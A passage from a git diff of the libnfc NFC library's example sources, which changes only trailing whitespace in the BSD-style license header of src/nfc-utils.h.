DAMAGE. - * + * * Note that this license only applies on the examples, NFC library itself is under LGPL * */ diff --git a/src/nfc-utils.h b/src/nfc-utils.h index 4243ffc..acf867d 100644 --- a/src/nfc-utils.h +++ b/src/nfc-utils.h @@ -1,13 +1,13 @@ /*- * Public platform independent Near Field Communication (NFC) library examples - * + * * Copyright (C) 2009, Roel Verdult * Copyright (C) 2010, Romuald Conty, Romain Tartière - * + * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * 1) Redistributions of source code must retain the above copyright notice, - * this list of conditions and the following disclaimer. + * this list of conditions and the following disclaimer. * 2 )Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. @@ -23,7 +23,7 @@ * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH DAMAGE. - * + * * Note that this license only applies on the examples, NFC library itself is under LGPL * */